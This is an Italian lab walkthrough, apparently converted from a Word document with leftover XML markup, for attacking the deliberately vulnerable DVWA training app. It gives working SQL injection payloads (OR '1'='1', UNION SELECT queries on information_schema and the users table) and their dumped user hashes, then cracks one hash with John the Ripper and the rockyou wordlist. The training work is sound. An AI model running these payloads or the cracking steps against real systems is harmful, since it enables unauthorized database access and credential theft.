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834g3vrl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Guida al Recupero Password su DVWA - Solo Browser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q5bbw0k5h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Prerequisiti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web (Firefox/Chrome)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 a DVWA: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http://192.168.13.150/dvwa/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Credenziali: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rgerqrdcl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1: Configurazione Iniziale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7tarj13j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Accesso a DVWA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Apri il browser e vai su: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http://192.168.13.150/dvwa/login.php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6xc742lod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Imposta Livello LOW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 menu a sinistra, clicca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 Security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Seleziona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dal dropdown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0a4v1vrii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2: SQL Injection - Livello LOW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a00nuynrr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Test della Vulnerabilità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 nel menu a sinistra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Inserisci nel campo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OR '1'='1’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Risultato atteso:</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> Vedrai tutti gli utenti del database (admin, pablo, ecc.)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conferma che il sito è vulnerabile!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trk5lytwb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Trovare il Numero di Colonne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Usiamo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SELECT</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> per capire quante colonne ha la tabella.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Inserisci nel campo ID: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' UNION SELECT NULL – -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3 colonne funziona! La tabella ha 3 colonne.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t0tfu58nz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Trovare le Tabelle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vedere tutte le tabelle nel database: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1' UNION SELECT table_name,NULL FROM information_schema.tables WHERE table_schema='mysql'-- -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Tabella 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(contiene gli utenti)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vrs6k0m62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Trovare le Colonne della Tabella Users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' UNION SELECT COLUMN_NAME, NULL, NULL FROM information_schema.columns WHERE TABLE_NAME='users' --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Colonne trovate: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first_name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last_name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(username)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(hash MD5)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09pov18kf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Estrarre Username e Password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' OR '1'='1' UNION SELECT user, password FROM users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Risultato nel browser:</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Table1"/>
        <w:tblW w:w="8400.0" w:type="dxa"/>
        <w:jc w:val="left"/>
        <w:tblLayout w:type="fixed"/>
        <w:tblLook w:val="0600"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="825"/>
        <w:gridCol w:w="7575"/>
        <w:tblGridChange w:id="0">
          <w:tblGrid>
            <w:gridCol w:w="825"/>
            <w:gridCol w:w="7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5f4dcc3b5aa765d61d8327deb882cf99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pablo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0d107d09f5bbe40cade3de5c71e9e9b7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1337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8d3533d75ae2c3966d7e0d4fcc69216b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L'hash di Pablo è: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0d107d09f5bbe40cade3de5c71e9e9b7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jy9lbq53k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3: Crackare l'Hash di Pablo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sxd196vkw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Metodo 1: John the Ripper (Kali Linux)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Sul terminale di Kali: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Crea il file con l'hash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echo "0d107d09f5bbe40cade3de5c71e9e9b7" &gt; hash.txt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Cracka con John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john --wordlist=/usr/share/wordlists/rockyou.txt --format=raw-md5 hash.txt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Letmein    (?)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1g 0:00:00:00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i2zdadw3k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4: trovare gli user password in modalita medium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dkk661cp4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Imposta Livello LOW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Nel menu a sinistra, clicca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DVWA Security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Seleziona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dal dropdown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b0kduyakgw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 SQL injection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 UNION SELECT user, password FROM users#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Risultato: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First name: admin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Surname: admin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First name: admin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Surname: 5f4dcc3b5aa765d61d8327deb882cf99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First name: gordonb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Surname: e99a18c428cb38d5f260853678922e03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First name: 1337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Surname: 8d3533d75ae2c3966d7e0d4fcc69216b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First name: pablo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Surname: 0d107d09f5bbe40cade3de5c71e9e9b7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ID: 1 UNION SELECT user, password FROM users#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First name: smithy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Surname: 5f4dcc3b5aa765d61d8327deb882cf99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